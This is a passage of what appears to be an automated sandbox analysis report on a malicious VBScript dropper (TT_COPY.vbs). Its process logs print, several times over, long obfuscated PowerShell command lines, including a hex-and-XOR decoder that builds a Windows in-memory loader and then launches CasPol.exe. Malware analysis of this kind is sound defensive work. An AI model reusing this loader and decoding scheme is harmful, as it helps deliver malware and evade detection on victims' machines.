Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0MJump to behavior
          Potential malicious VBS script found (suspicious strings)
          Source: Initial file: Impi11.ShellExecute Skyler, " " & chrw(34) + Ce8 + chrw(34), "", "", 0
          Very long command line found
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 21279
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6954
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 21279Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6954Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CC42807_2_00CC4280
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CC19607_2_00CC1960
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CD5C387_2_00CD5C38
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CD79E07_2_00CD79E0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CD51287_2_00CD5128
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CDB9307_2_00CDB930
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CDDEC87_2_00CDDEC8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CDDA777_2_00CDDA77
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CDC3237_2_00CDC323
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CD45007_2_00CD4500
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00DAC1807_2_00DAC180
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1F824FA07_2_1F824FA0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1F82D7207_2_1F82D720
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1F827AE07_2_1F827AE0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D45AFDA NtQuerySystemInformation,7_2_1D45AFDA
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D45AFB8 NtQuerySystemInformation,7_2_1D45AFB8
          Source: TT_COPY.vbsInitial sample: Strings found which are bigger than 50
          Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CC
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0MJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 